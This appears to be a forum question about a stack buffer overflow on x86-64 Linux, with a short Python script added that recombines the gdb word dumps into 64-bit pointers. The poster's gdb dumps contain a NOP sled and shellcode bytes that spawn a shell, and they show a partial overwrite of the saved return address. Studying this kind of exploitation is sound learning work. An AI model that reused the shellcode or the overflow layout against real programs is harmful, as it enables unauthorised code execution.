Using gdb, I want to put the address 0x7fffffffe0f0 into the eip register so that the buffer overflow succeeds. The problem is that the size of this address (0x7fffffffe0f0) is larger than the address holding the saved eip register (0x00ffff10).
Why is the address on the stack larger than the address of the saved eip?
How can I manage to replace the chosen address on the stack that holds the saved eip register?
gdb: x/24xw $rsp
0x7fffffffe0e0: 0x00000000 0x00000000 0xffffe537 0x00007fff
0x7fffffffe0f0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe100: 0x90909090 0x90909090 0x90909090 0xeb909090
0x7fffffffe110: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c
0x7fffffffe120: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8
0x7fffffffe130: 0xffffdce8 0x69622fff 0x68732f6e 0x00ffff10 <--here my eip register
Thanks for your replies :)
gdb: x/60xw $rsp
0x7fffffffe0e0: 0x00000000 0x00000000 0xffffe537 0x00007fff
0x7fffffffe0f0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe100: 0x90909090 0x90909090 0x90909090 0xeb909090
0x7fffffffe110: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c
0x7fffffffe120: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8
0x7fffffffe130: 0xffffdce8 0x69622fff 0x68732f6e 0x00ffff10 <- rip
0x7fffffffe140: 0xffffe238 0x00007fff 0x00000000 0x00000002
0x7fffffffe150: 0x55554700 0x00005555 0xf7e1109b 0x00007fff
0x7fffffffe160: 0x00000000 0x00000000 0xffffe238 0x00007fff
0x7fffffffe170: 0x00040000 0x00000002 0x555546b8 0x00005555
0x7fffffffe180: 0x00000000 0x00000000 0x11fbb6ee 0x49163b74
0x7fffffffe190: 0x55554580 0x00005555 0xffffe230 0x00007fff
0x7fffffffe1a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1b0: 0x5d3bb6ee 0x1c436e21 0xbf5db6ee 0x1c437e1c
0x7fffffffe1c0: 0x00000000 0x00000000 0x00000000 0x00000000
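The dumps above are printed in 4-byte words (`x/Nxw`), but `$rsp` is a 64-bit register and x86-64 pointers occupy two adjacent words, low word first. The following added example (not part of the original question) parses such a gdb dump and recombines aligned word pairs into little-endian 64-bit values; the sample rows are copied from the dump, and the pointer-range heuristic is an assumption about typical user-space layout.

```python
import re

# Constructed sample: rows copied from the gdb 'x/60xw $rsp' dump quoted in the question.
SAMPLE_DUMP = """\
0x7fffffffe0e0: 0x00000000 0x00000000 0xffffe537 0x00007fff
0x7fffffffe0f0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe140: 0xffffe238 0x00007fff 0x00000000 0x00000002
0x7fffffffe150: 0x55554700 0x00005555 0xf7e1109b 0x00007fff
"""

# One 'x/Nxw' row: an address, a colon, then 4-byte words.
# Trailing annotations such as "<- rip" are simply not matched and are ignored.
ROW_RE = re.compile(r"^\s*(0x[0-9a-fA-F]+):\s*((?:0x[0-9a-fA-F]{8}\s*)+)")


def parse_words(dump):
    """Map the address of every 4-byte word in the dump to its integer value."""
    words = {}
    for line in dump.splitlines():
        m = ROW_RE.match(line)
        if m:
            base = int(m.group(1), 16)
            for i, tok in enumerate(m.group(2).split()):
                words[base + 4 * i] = int(tok, 16)
    return words


def qwords(words):
    """Join each 8-byte-aligned pair of words into one little-endian 64-bit value.

    gdb prints the low word first and the high word second, so the pair
    '0xffffe537 0x00007fff' at 0x7fffffffe0e8 is the pointer 0x00007fffffffe537.
    """
    return {a: v | (words[a + 4] << 32)
            for a, v in words.items() if a % 8 == 0 and a + 4 in words}


def looks_like_high_user_pointer(value):
    """Heuristic (assumption): the 0x00007fxx_xxxx_xxxx range where the stack
    and shared libraries usually live in a 64-bit Linux process."""
    return 0x00007ff000000000 <= value < 0x0000800000000000


if __name__ == "__main__":
    for addr, val in sorted(qwords(parse_words(SAMPLE_DUMP)).items()):
        tag = "  <- 64-bit pointer" if looks_like_high_user_pointer(val) else ""
        print(f"0x{addr:016x}: 0x{val:016x}{tag}")
```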